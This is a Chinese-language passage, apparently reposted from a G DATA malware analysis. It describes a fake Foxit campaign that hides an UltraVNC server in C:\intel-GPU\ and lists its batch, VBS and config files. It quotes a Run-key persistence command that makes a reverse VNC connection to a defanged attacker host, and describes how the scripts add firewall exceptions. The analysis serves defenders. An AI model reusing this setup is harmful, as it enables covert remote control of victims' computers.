详细内容或原文请订阅后点击阅览

虚假文档,真实访问:福昕模拟实现隐形 VNC 控制

2026年4月23日 09:00 33 Comments
X Twitter Instagram Mail

冒充可信供应商的攻击者不仅会损害原始供应商的声誉,还会造成大量麻烦。

来源:G DATA _恶意软件

揭秘 — 隐藏的 UltraVNC 服务器

攻击者将流行的远程访问工具 UltraVNC 伪装成 GPU 和驱动程序相关文件,这样即使是中等技术用户也可能会忽略它们。 安装 UltraVNC 后,以下文件位于文件夹 C:\intel-GPU\ 中。 这些组件中的每一个都具有特定的目的,即拼凑出隐藏的远程访问设置。

gpu.txt
  • 一个 Windows 批处理脚本,首先枚举 Windows 网络配置文件注册表项,在此过程中构建基于 GUID 的环境变量。然后,它会添加一个或多个防火墙例外,以允许 c:\intel -GPU \gpu.exe 通过系统防火墙进行通信。最后,它尝试执行 c:\intel -GPU \gpu.exe,其参数可启用自动重新连接并启动与 Hallonews.servemp3(dot)com:5500 的连接。
    • IDD.txt
  • 存储本地生成的受感染系统唯一的标识符。当 VNC 客户端出站连接到攻击者的基础设施时,此 ID 会作为参数传递。
    • SilentRun.vbs
  • 通过 WScript 执行 gpu.cmd
    • UltraVNC.ini
  • 包含预配置的 VNC 服务器设置,包括密码、端口和允许的连接
    • gpu.cmd
  • Windows 批处理脚本,生成数字 ID 并将其写入 IDD.txt,然后打开 Passport.jpg 作为诱饵。它通过在 HKCU\Software\Microsoft\Windows\CurrentVersion\Run 中创建自动运行条目来建立持久性,并在其中写入以下命令:
    • EbiClient - C:\intel-GPU\gpu.exe -multi -autoreconnect ID:%numc% -connect Hallonews.servemp3(dot)com:5500
  • 然后,该脚本通过将其内容传输到 cmd 来执行 c:\intel-gpu\gpu.txt 中的其他命令,并重复强制终止 rundll32.exe。总的来说,它充当持久性和启动器脚本,支持远程客户端,同时继续执行辅助指令。
    • gpu.exe
    Windows 流行的 远程 防火墙 gpu 启动器 ID 连接 攻击者 特定的 服务器 驱动程序 相关文件 文件夹 持久性 客户端 配置文件 txt 标识符 intel 每一个 系统 允许的 访问 UltraVNC 隐藏的 exe GPU 环境变量 强制 唯一的 设置 脚本 基础设施 自动 动程序